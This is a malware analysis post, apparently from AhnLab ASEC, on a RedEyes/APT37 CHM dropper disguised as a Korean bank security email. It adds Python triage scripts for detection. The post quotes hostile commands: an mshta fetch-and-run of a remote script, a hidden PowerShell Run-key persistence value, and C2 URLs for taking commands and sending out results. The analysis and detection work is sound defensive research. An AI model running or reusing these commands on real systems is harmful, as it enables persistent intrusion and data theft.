CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

The ASEC (AhnLab Security Emergency response Center) analysis team has discovered that a CHM (Compiled HTML Help) malware, believed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, reported back in February, has the same format as the command used in this attack. That earlier analysis, along with the details of how the CHM malware operates, is described in the following post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help window disguised as a security email from a Korean financial company. The malicious script embedded in the CHM runs while this decoy is being displayed, so the user sees nothing out of the ordinary. Malware distribution via CHM files has increased recently.

Help screen disguised as a security email

The malicious script is shown below. Like the other CHM malware introduced in the past, it abuses the HTML Help ActiveX control (hhctrl.ocx, CLSID ADB880A6-D8FF-11CF-9377-00AA003B7A11) embedded as an OBJECT element whose Command parameter is set to ShortCut. A script calls the object’s Click method, which runs the program and arguments listed under the Item1 parameter. Here the command launches mshta.exe against a remote URL, so an additional script hosted on the attacker’s server is fetched and executed by the mshta process.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM
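The following is an added example, not code from the ASEC post or from the sample itself: a small Python triage script that locates HTML Help ShortCut objects in HTML extracted from a CHM and reports which program they launch and whether a script auto-clicks them. It assumes the CHM has already been decompiled to .htm files (for example with hh.exe -decompile or 7-Zip); the HTML it runs on is a constructed stand-in that mirrors the technique described above, not the content of the analysed file.

```python
"""Triage of HTML extracted from a CHM: locate HTML Help "ShortCut" objects.

Added example, not code from the ASEC post. It assumes the CHM has already
been decompiled to plain .htm files (e.g. `hh.exe -decompile <dir> <file.chm>`
or 7-Zip). SAMPLE_HTML is constructed to mirror the technique the post
describes; it is not the content of the analysed sample.
"""
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx). A CHM page embeds it as
# <OBJECT classid="clsid:..."> and drives it through <PARAM> tags.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Living-off-the-land binaries commonly named in the Item1 program field.
LOLBINS = ("mshta", "powershell", "cmd", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin")

# Constructed sample page: decoy text plus a hidden ShortCut object that a
# script auto-clicks. The defanged URL is the one quoted in the post.
SAMPLE_HTML = """<html><body>
<p>Security mail notice</p>
<OBJECT id=shortcut classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=",mshta.exe,hxxp://shacc[.]kr/skin/product/1.html">
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>shortcut.Click();</SCRIPT>
</body></html>"""


class HelpObjectParser(HTMLParser):
    """Collect every hhctrl.ocx <OBJECT> together with its <PARAM> name/value pairs."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object" and HHCTRL_CLSID in a.get("classid", "").lower():
            self._current = {"id": a.get("id", ""), "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None


def parse_item1(item1):
    """Item1 of a ShortCut command has the layout '<window class>,<program>,<arguments>'."""
    parts = item1.split(",", 2) + ["", "", ""]
    return {"window": parts[0].strip(), "program": parts[1].strip(),
            "args": parts[2].strip()}


def extract_shortcuts(html):
    """Return one record per ShortCut object: target program, its arguments,
    whether a script calls <id>.Click() and whether the program is a LOLBin."""
    parser = HelpObjectParser()
    parser.feed(html)
    parser.close()
    findings = []
    for obj in parser.objects:
        params = obj["params"]
        if params.get("command", "").strip().lower() != "shortcut":
            continue
        item = parse_item1(params.get("item1", ""))
        # Auto-execution requires a script to call the object's Click method.
        auto_clicked = bool(obj["id"]) and re.search(
            r"\b" + re.escape(obj["id"]) + r"\s*\.\s*Click\s*\(", html, re.I) is not None
        exe = item["program"].lower().rsplit("\\", 1)[-1]
        findings.append({
            "id": obj["id"],
            "program": item["program"],
            "args": item["args"],
            "auto_clicked": auto_clicked,
            "suspicious": any(exe.startswith(b) for b in LOLBINS),
        })
    return findings


if __name__ == "__main__":
    for finding in extract_shortcuts(SAMPLE_HTML):
        print(finding)
```

Running it over every .htm in a decompiled CHM gives a quick yes/no on whether the file carries an executable shortcut at all; a ShortCut object that is auto-clicked and points at mshta, PowerShell or cmd is the signature of this family of droppers.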

The “1.html” file fetched by the mshta process contains JavaScript whose job is to launch an encoded PowerShell command. The PowerShell command executed here has a similar format to the command used during the M2RAT attack mentioned above.

1.html file code
Process tree
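As an added example (not code from the ASEC post), the Python below recovers the PowerShell command carried by an mshta-delivered JavaScript page. It assumes the common encoding form, PowerShell’s -EncodedCommand switch carrying base64 of UTF-16LE text, and that the command is passed as a string literal to WScript.Shell.Run; both the JavaScript and the command it carries are constructed stand-ins built inside the script so it runs offline, not the real contents of 1.html.

```python
"""Recover an encoded PowerShell command from mshta-delivered JavaScript.

Added example, not code from the ASEC post. Assumption: the command uses the
-EncodedCommand form (base64 of UTF-16LE text). SAMPLE_PLAINTEXT and SAMPLE_JS
are constructed stand-ins built here so the example runs offline; they are
not the real 1.html or the real decoded payload.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so an encoded
# command may arrive as -e, -ec, -en, -enc, -encodedc, -encodedcommand, ...
ENC_SWITCH = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# Double- or single-quoted JS string literals (group 1 / group 2).
JS_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"' + r"|'((?:[^'\\]|\\.)*)'")


def encode_command(text):
    """Encode text the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext behind an -EncodedCommand argument, or None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_powershell_from_js(js):
    """Decode every JS string literal that carries an encoded PowerShell command."""
    found = []
    for m in JS_STRING.finditer(js):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        decoded = decode_encoded_command(literal)
        if decoded is not None:
            found.append(decoded)
    return found


# Constructed stand-in for the decoded stage: it only shows the Run-key
# registration shape the post describes, not the real C2 logic.
SAMPLE_PLAINTEXT = (
    "$p='HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run';"
    "$v='c:\\windows\\system32\\cmd.exe /c mshta hxxp://shacc[.]kr/skin/product/1.html';"
    "New-ItemProperty -Path $p -Name icxrNpVd -Value $v -PropertyType String -Force"
)

# Constructed stand-in for the JavaScript inside 1.html.
SAMPLE_JS = (
    '<script language="javascript">\n'
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'sh.Run("powershell.exe -WindowStyle hidden -ep bypass -enc '
    + encode_command(SAMPLE_PLAINTEXT) + '", 0, false);\n'
    'window.close();\n'
    '</script>'
)


if __name__ == "__main__":
    for cmd in extract_powershell_from_js(SAMPLE_JS):
        print(cmd)
```

The prefix handling matters in practice: a detection or decoder that only looks for the literal string “-enc” or “-EncodedCommand” misses a command launched with “-e”, which PowerShell accepts just as readily.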

An examination of the decoded PowerShell command revealed that, apart from the C2 address, the file name under which the command execution results are saved, and the registry value name, the code is identical to the command used back in February. The command registers a RUN key to establish persistence, receives commands from the threat actor’s server, and transmits the command execution results. The RUN key value is worth a closer look: cmd.exe parses the || operator, so it first runs PowerShell with “ping -n 1 -w 361881 2.2.2.2” and only falls through to mshta when that stage returns a non-zero exit code, which happens once the single ping to an address that does not answer times out after roughly six minutes. The ping therefore works as a delay before re-infection at logon, and the persistence entry leaves no script on disk, only the URL that is re-fetched.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command
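The following is an added example, not code from the ASEC post: a Python triage helper that parses the persistence value quoted above (extracting the ping delay and the fallback command) and scans proxy log lines for the two mid.php URL shapes, decoding the base64 results field. The Run value is the one listed in the post; the proxy log lines are constructed to show the matching and are not real traffic. Note that the post defangs URLs as hxxp, so real telemetry will carry http instead.

```python
"""Triage of the RUN key value and the mid.php C2 URL pattern from the post.

Added example, not code from the ASEC post. RUN_VALUE is the persistence
value the post lists; SAMPLE_PROXY_LOG is constructed, not real traffic.
The post defangs URLs as hxxp; real telemetry carries http.
"""
import base64
import re
from urllib.parse import unquote

RUN_VALUE = (r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden "
             r"-NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 "
             r"|| mshta hxxp://shacc[.]kr/skin/product/1.html")

# "ping -n <count> -w <timeout ms> <ip> || <fallback> <arg>": cmd.exe evaluates
# ||, so the fallback runs once ping fails, i.e. after the timeout if <ip>
# never answers. The ping is a sleep, not a connectivity check.
PING_FALLBACK = re.compile(
    r"ping\s+-n\s+(?P<count>\d+)\s+-w\s+(?P<timeout>\d+)\s+(?P<ip>\S+)\s*\|\|\s*"
    r"(?P<fallback>\S+)\s+(?P<arg>\S+)", re.I)

# Poll: mid.php?U=<computer>+<user>; upload: mid.php?R=<base64 results>.
C2_PATTERN = re.compile(r"""/skin/product/mid\.php\?(?P<kind>[UR])=(?P<val>[^\s&"']+)""")


def analyze_run_value(value):
    """Break a ping-then-mshta persistence value into its parts, or None."""
    m = PING_FALLBACK.search(value)
    if not m:
        return None
    timeout_ms = int(m.group("timeout"))
    arg = m.group("arg")
    return {
        "delay_ms": timeout_ms,
        "delay_minutes": round(timeout_ms / 60000, 2),
        "probe_ip": m.group("ip"),
        "fallback": m.group("fallback").lower(),
        "fallback_arg": arg,
        "fetches_remote": arg.lower().startswith(("http://", "https://", "hxxp://")),
        "hidden": "-windowstyle hidden" in value.lower(),
        "bypass": re.search(r"-e(?:x[a-z]*|p)\s+bypass", value, re.I) is not None,
    }


def classify_c2_hit(url):
    """Classify a mid.php request as a command poll or a results upload."""
    m = C2_PATTERN.search(url)
    if not m:
        return None
    kind, val = m.group("kind"), unquote(m.group("val"))
    if kind == "U":
        computer, _, user = val.partition("+")
        return {"direction": "poll", "computer": computer, "user": user}
    raw = val + "=" * (-len(val) % 4)
    try:
        result = base64.b64decode(raw).decode("utf-8", "replace")
    except ValueError:
        result = None
    return {"direction": "upload", "result": result}


def scan_proxy_log(lines):
    """Return (line number, classification) for every line that matches the C2 shape."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = classify_c2_hit(line)
        if hit is not None:
            hits.append((n, hit))
    return hits


# Constructed proxy log: one poll, one upload, one unrelated request.
RESULT_B64 = base64.b64encode(b"desktop-01\\victim\r\n").decode("ascii")
SAMPLE_PROXY_LOG = [
    "2023-03-03T09:12:01 10.0.0.15 GET http://shacc[.]kr/skin/product/mid.php?U=DESKTOP-01+victim",
    "2023-03-03T09:12:04 10.0.0.15 GET http://shacc[.]kr/skin/product/mid.php?R=" + RESULT_B64,
    "2023-03-03T09:13:00 10.0.0.22 GET http://example.com/index.html",
]


if __name__ == "__main__":
    print(analyze_run_value(RUN_VALUE))
    for n, hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(n, hit)
```

For hunting, the generic part is the Run value shape (a hidden, policy-bypassing PowerShell whose only job is to ping an address and fall through to mshta with a URL), which survives changes to the C2 domain and the random value name; the mid.php parameter names are specific to this campaign and belong in the IOC list rather than in a long-lived rule.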

When a system is infected with this type of malware, it can suffer great damage, since the malware can perform various malicious acts such as downloading files and exfiltrating information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may be dressed up with content on topics of interest to the target to encourage them to execute it, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)

[IOC]
8d2eebd10d90953cfada64575328ae24
806fad8aac92164f971c04bb4877c00f

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
